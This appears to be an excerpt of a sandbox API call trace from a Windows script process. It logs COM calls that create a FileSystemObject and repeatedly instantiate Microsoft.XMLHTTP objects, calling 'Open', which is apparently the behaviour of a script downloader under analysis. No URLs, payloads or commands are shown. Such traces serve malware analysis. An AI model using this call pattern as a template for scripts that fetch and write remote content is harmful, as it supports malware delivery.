	[0404.518] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0404.518] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0404.518] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0404.518] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0404.518] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0404.518] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0405.500] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0405.500] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0405.500] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0405.502] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0405.502] SysStringLen (param_1=0x0) returned 0x0
	[0405.502] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0405.502] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0405.502] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0405.502] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0405.502] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74a8) returned 0x0
	[0405.502] ??2@YAPEAX_K@Z () returned 0x62f330
	[0405.502] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74a8, pUnkSite=0x62f330) 
	[0405.502] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0405.502] XMLHTTPRequest:IUnknown:Release (This=0x49c74a8) returned 0x0
	[0405.502] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0405.503] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0405.503] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0405.503] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0405.507] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0405.508] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0405.508] SysStringLen (param_1=0x0) returned 0x0
	[0405.508] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0405.508] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0405.508] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0405.508] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0405.508] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0405.508] ??2@YAPEAX_K@Z () returned 0x62f310
	[0405.508] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0405.508] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0405.508] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0405.508] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0405.508] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0405.508] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0405.508] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0405.509] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0405.509] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0405.509] SysStringLen (param_1=0x0) returned 0x0
	[0405.509] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0405.509] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0405.509] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0405.509] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0405.509] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0405.509] ??2@YAPEAX_K@Z () returned 0x62f330
	[0405.509] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0405.509] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0405.509] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0405.509] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0405.509] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0405.509] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0405.510] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0405.510] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0405.510] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0405.510] SysStringLen (param_1=0x0) returned 0x0
	[0405.510] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0405.510] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0405.510] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77f0) returned 0x0
	[0405.510] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0405.510] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7858) returned 0x0
	[0405.510] ??2@YAPEAX_K@Z () returned 0x62f310
	[0405.510] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7858, pUnkSite=0x62f310) 
	[0405.510] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0405.510] XMLHTTPRequest:IUnknown:Release (This=0x49c7858) returned 0x0
	[0405.510] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77f0) returned 0x0
	[0405.510] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77f0) returned 0x3
	[0405.510] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0405.510] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0405.511] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0405.511] longjmp () 
	[0405.511] longjmp () 
	[0405.511] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0405.511] SysStringLen (param_1=0x0) returned 0x0
	[0405.511] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0405.511] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0405.511] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0405.511] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0405.511] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7788) returned 0x0
	[0405.511] ??2@YAPEAX_K@Z () returned 0x62f330
	[0405.511] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7788, pUnkSite=0x62f330) 
	[0405.511] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0405.511] XMLHTTPRequest:IUnknown:Release (This=0x49c7788) returned 0x0
	[0405.511] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0405.511] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0405.512] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0405.512] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0405.512] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0405.512] longjmp () 
	[0405.512] longjmp () 
	[0405.512] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0405.512] SysStringLen (param_1=0x0) returned 0x0
	[0405.512] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0405.512] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0405.512] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0405.512] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0405.512] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0405.512] ??2@YAPEAX_K@Z () returned 0x62f310
	[0405.512] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0405.512] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0405.513] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
